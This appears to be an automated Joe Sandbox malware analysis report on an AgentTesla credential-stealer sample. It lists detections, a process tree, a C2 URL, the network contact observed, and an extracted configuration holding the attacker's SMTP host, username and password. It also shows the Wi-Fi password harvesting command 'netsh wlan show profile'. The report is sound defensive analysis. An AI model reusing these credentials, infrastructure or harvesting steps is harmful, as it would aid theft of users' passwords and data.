Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report sample2.bin

Overview

General Information

Sample Name:sample2.bin (renamed file extension from bin to exe)
Analysis ID:339443
MD5:b0f2d519ccae5bf1435264e0979770ce
SHA1:212da7b3ed9c89d83941f6bb0dba889fa24f8f6a
SHA256:a4fdc26d6b70eaf0a62cca36286412901f48881eae616d38b96d8ae0cb0f29c7

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected AgentTesla
Yara detected AntiVM_3
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses netsh to modify the Windows network and firewall settings
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • sample2.exe (PID: 7104 cmdline: 'C:\Users\user\Desktop\sample2.exe' MD5: B0F2D519CCAE5BF1435264E0979770CE)
    • sample2.exe (PID: 5652 cmdline: {path} MD5: B0F2D519CCAE5BF1435264E0979770CE)
      • netsh.exe (PID: 2208 cmdline: 'netsh' wlan show profile MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 4612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • nwama.exe (PID: 6508 cmdline: 'C:\Users\user\AppData\Local\Temp\nwama\nwama.exe' MD5: B0F2D519CCAE5BF1435264E0979770CE)
    • nwama.exe (PID: 7068 cmdline: {path} MD5: B0F2D519CCAE5BF1435264E0979770CE)
      • netsh.exe (PID: 5780 cmdline: 'netsh' wlan show profile MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • nwama.exe (PID: 5848 cmdline: 'C:\Users\user\AppData\Local\Temp\nwama\nwama.exe' MD5: B0F2D519CCAE5BF1435264E0979770CE)
    • nwama.exe (PID: 6592 cmdline: {path} MD5: B0F2D519CCAE5BF1435264E0979770CE)
      • netsh.exe (PID: 5480 cmdline: 'netsh' wlan show profile MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "GILTzioSjfs2NDI", "URL: ": "http://eu0j0ejPMgs9.com", "To: ": "", "ByHost: ": "us2.smtp.mailhostbox.com:587", "Password: ": "6QRSH5w5UD", "From: ": ""}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000012.00000002.991842162.0000000002D70000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000000.00000002.661861944.0000000003D5A000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000012.00000002.991287271.0000000002C14000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000B.00000002.996705258.0000000003454000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000001.00000002.987520387.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 19 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.sample2.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              18.2.nwama.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                11.2.nwama.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

                  Sigma Overview

                  System Summary:

                  barindex
                  Sigma detected: Capture Wi-Fi passwordShow sources
                  Source: Process startedAuthor: Joe Security: Data: Command: 'netsh' wlan show profile, CommandLine: 'netsh' wlan show profile, CommandLine|base64offset|contains: V, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: {path}, ParentImage: C:\Users\user\Desktop\sample2.exe, ParentProcessId: 5652, ProcessCommandLine: 'netsh' wlan show profile, ProcessId: 2208

                  Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Antivirus / Scanner detection for submitted sampleShow sources
                  Source: sample2.exeAvira: detected
                  Antivirus detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeAvira: detection malicious, Label: TR/Kryptik.bkfmg
                  Found malware configurationShow sources
                  Source: sample2.exe.5652.1.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "GILTzioSjfs2NDI", "URL: ": "http://eu0j0ejPMgs9.com", "To: ": "", "ByHost: ": "us2.smtp.mailhostbox.com:587", "Password: ": "6QRSH5w5UD", "From: ": ""}
                  Multi AV Scanner detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeMetadefender: Detection: 25%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeReversingLabs: Detection: 80%
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: sample2.exeMetadefender: Detection: 25%Perma Link
                  Source: sample2.exeReversingLabs: Detection: 80%
                  Source: 1.2.sample2.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                  Source: 18.2.nwama.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                  Source: 11.2.nwama.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_05FF13C2 CryptUnprotectData,
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_05FF1387 CryptUnprotectData,
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_05C11066 CryptUnprotectData,
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 11_2_05C1102B CryptUnprotectData,
                  Source: sample2.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: C:\Users\user\Desktop\sample2.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                  Source: sample2.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: C:\Users\Vendetta\source\repos\Defender Protect\Defender Protect\obj\Debug\Defender Protect.pdb source: sample2.exe, 00000000.00000002.665736666.0000000006290000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.720529552.0000000002F86000.00000004.00000001.sdmp, nwama.exe, 0000000F.00000002.736332738.00000000031A6000.00000004.00000001.sdmp
                  Source: Binary string: mscorrc.pdb source: sample2.exe, 00000000.00000002.667266340.0000000006CA0000.00000002.00000001.sdmp, sample2.exe, 00000001.00000002.999576706.0000000006670000.00000002.00000001.sdmp, nwama.exe, 0000000A.00000002.725183141.00000000069F0000.00000002.00000001.sdmp, nwama.exe, 0000000B.00000002.1000299165.0000000006510000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.740831894.0000000006B60000.00000002.00000001.sdmp, nwama.exe, 00000012.00000002.998659429.0000000005F50000.00000002.00000001.sdmp

                  Networking:

                  barindex
                  C2 URLs / IPs found in malware configurationShow sources
                  Source: Malware configuration extractorURLs: http://eu0j0ejPMgs9.com
                  Source: global trafficTCP traffic: 192.168.2.4:49760 -> 208.91.198.143:587
                  Source: Joe Sandbox ViewIP Address: 208.91.198.143 208.91.198.143
                  Source: global trafficTCP traffic: 192.168.2.4:49760 -> 208.91.198.143:587
                  Source: unknownDNS traffic detected: queries for: us2.smtp.mailhostbox.com
                  Source: nwama.exe, 00000012.00000002.991463168.0000000002CAE000.00000004.00000001.sdmp, nwama.exe, 00000012.00000002.992391711.0000000002DDC000.00000004.00000001.sdmpString found in binary or memory: http://eu0j0ejPMgs9.com
                  Source: sample2.exe, 00000001.00000003.724871830.00000000013B4000.00000004.00000001.sdmpString found in binary or memory: http://eu0j0ejPMgs9.com3853321935-2125563209-4053062332-1002_Classes
                  Source: sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                  Source: sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: sample2.exe, 00000000.00000003.645220057.000000000504E000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
                  Source: sample2.exe, 00000000.00000003.644898716.000000000504E000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comep
                  Source: sample2.exe, 00000000.00000003.644898716.000000000504E000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comg
                  Source: sample2.exe, 00000000.00000003.644898716.000000000504E000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comhly
                  Source: sample2.exe, 00000000.00000003.645020096.000000000504E000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comi
                  Source: sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: sample2.exe, 00000000.00000002.662931155.0000000005010000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: sample2.exe, 00000000.00000003.647869153.0000000005049000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
                  Source: sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: sample2.exe, 00000000.00000003.648321789.0000000005049000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.htmltF1
                  Source: sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: sample2.exe, 00000000.00000003.648093017.0000000005049000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers;
                  Source: sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: sample2.exe, 00000000.00000003.649192807.0000000005045000.00000004.00000001.sdmp, sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: sample2.exe, 00000000.00000003.647892711.0000000005049000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersZ
                  Source: sample2.exe, 00000000.00000003.647942862.0000000005049000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersers
                  Source: sample2.exe, 00000000.00000003.649363101.0000000005014000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF
                  Source: sample2.exe, 00000000.00000003.649363101.0000000005014000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comI.TTF
                  Source: sample2.exe, 00000000.00000003.649363101.0000000005014000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comM.TTFN
                  Source: sample2.exe, 00000000.00000003.649363101.0000000005014000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalic
                  Source: sample2.exe, 00000000.00000002.662931155.0000000005010000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.como
                  Source: sample2.exe, 00000000.00000003.649363101.0000000005014000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comsivFw
                  Source: sample2.exe, 00000000.00000003.649363101.0000000005014000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comueS
                  Source: sample2.exe, 00000000.00000002.662931155.0000000005010000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comuec
                  Source: sample2.exe, 00000000.00000003.642777953.000000000502B000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                  Source: sample2.exe, 00000000.00000003.642811892.000000000502B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comicx
                  Source: sample2.exe, 00000000.00000003.644379621.0000000005014000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.cT
                  Source: sample2.exe, 00000000.00000003.644065481.0000000005014000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: sample2.exe, 00000000.00000003.644065481.0000000005014000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn)
                  Source: sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: sample2.exe, 00000000.00000003.644065481.0000000005014000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnLog
                  Source: sample2.exe, 00000000.00000003.644029155.000000000504D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnb
                  Source: sample2.exe, 00000000.00000003.644065481.0000000005014000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnc
                  Source: sample2.exe, 00000000.00000003.644029155.000000000504D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cns-m
                  Source: sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: sample2.exe, 00000000.00000003.644379621.0000000005014000.00000004.00000001.sdmpString found in binary or memory: http://www.m.
                  Source: sample2.exe, 00000000.00000003.642725281.000000000502B000.00000004.00000001.sdmp, sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: sample2.exe, 00000000.00000003.642725281.000000000502B000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comK
                  Source: sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: sample2.exe, 00000000.00000003.643501238.0000000005019000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: sample2.exe, 00000000.00000003.643501238.0000000005019000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krrad
                  Source: sample2.exe, 00000000.00000003.643501238.0000000005019000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krt
                  Source: nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                  Source: sample2.exe, 00000000.00000003.642985385.000000000502B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com.
                  Source: sample2.exe, 00000000.00000003.642940134.000000000502B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comm
                  Source: sample2.exe, 00000000.00000003.642985385.000000000502B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comn
                  Source: sample2.exe, 00000000.00000003.643012662.000000000502B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comnm.
                  Source: sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                  Source: sample2.exe, 00000000.00000003.649363101.0000000005014000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
                  Source: sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: nwama.exe, 00000012.00000002.991463168.0000000002CAE000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                  Source: nwama.exe, 00000012.00000002.991463168.0000000002CAE000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784

                  Key, Mouse, Clipboard, Microphone and Screen Capturing:

                  barindex
                  Installs a global keyboard hookShow sources
                  Source: C:\Users\user\Desktop\sample2.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\sample2.exe
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
                  Source: sample2.exe, 00000000.00000002.658005987.0000000000DCA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                  Source: C:\Users\user\Desktop\sample2.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeWindow created: window name: CLIPBRDWNDCLASS

                  System Summary:

                  barindex
                  .NET source code contains very large stringsShow sources
                  Source: sample2.exe, ClassCore.csLong String: Length: 86015
                  Source: 0.2.sample2.exe.590000.0.unpack, ClassCore.csLong String: Length: 86015
                  Source: 0.0.sample2.exe.590000.0.unpack, ClassCore.csLong String: Length: 86015
                  Source: nwama.exe.1.dr, ClassCore.csLong String: Length: 86015
                  Source: 1.0.sample2.exe.ee0000.0.unpack, ClassCore.csLong String: Length: 86015
                  Source: 1.2.sample2.exe.ee0000.1.unpack, ClassCore.csLong String: Length: 86015
                  Source: 10.0.nwama.exe.7c0000.0.unpack, ClassCore.csLong String: Length: 86015
                  Source: 10.2.nwama.exe.7c0000.0.unpack, ClassCore.csLong String: Length: 86015
                  Source: 11.2.nwama.exe.ae0000.1.unpack, ClassCore.csLong String: Length: 86015
                  Source: 11.0.nwama.exe.ae0000.0.unpack, ClassCore.csLong String: Length: 86015
                  Source: 15.2.nwama.exe.8d0000.0.unpack, ClassCore.csLong String: Length: 86015
                  Source: 15.0.nwama.exe.8d0000.0.unpack, ClassCore.csLong String: Length: 86015
                  Source: 18.2.nwama.exe.520000.1.unpack, ClassCore.csLong String: Length: 86015
                  Source: 18.0.nwama.exe.520000.0.unpack, ClassCore.csLong String: Length: 86015
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_06D109DA NtQuerySystemInformation,
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_06D1086A NtQueryInformationProcess,
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_06D10848 NtQueryInformationProcess,
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_06D1099F NtQuerySystemInformation,
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0163B362 NtQuerySystemInformation,
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0163B331 NtQuerySystemInformation,
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_06A609DA NtQuerySystemInformation,
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_06A6086A NtQueryInformationProcess,
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_06A6099F NtQuerySystemInformation,
                  Source: C:\Users\user\AppData\Local\Temp\nwama\nwama.exeCode function: 10_2_06A60848 NtQueryInformationProcess,
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_00592379
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DE2DC8
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DE45C0
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DE25E8
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DE0928
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DE36D0
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DEAE18
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DE9A17
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DE9C90
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DE44BB
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DE9CA0
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DE5C70
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DE5C60
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DE6410
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DE6400
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DE6838
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DE2555
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DEA2F8
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DE5EF8
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DEA2E7
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DE1AE0
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DE5298
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DE5288
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DE6678
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DE6669
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DE6230
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DE6220
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DEDFD0
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DE33EF
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_04DECF50
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 0_2_00593EF3
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_00EE2379
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0592E110
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0592E940
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_05920006
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0592F770
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0592E100
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0592E8C0
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0592E930
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0592ED76
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0592EDE3
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0592F760
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_0592F0AA
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06548AB0
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06540717
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06545F18
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_065483B8
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06541C6F
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06545080
                  Source: C:\Users\user\Desktop\sample2.exeCode function: 1_2_06544948
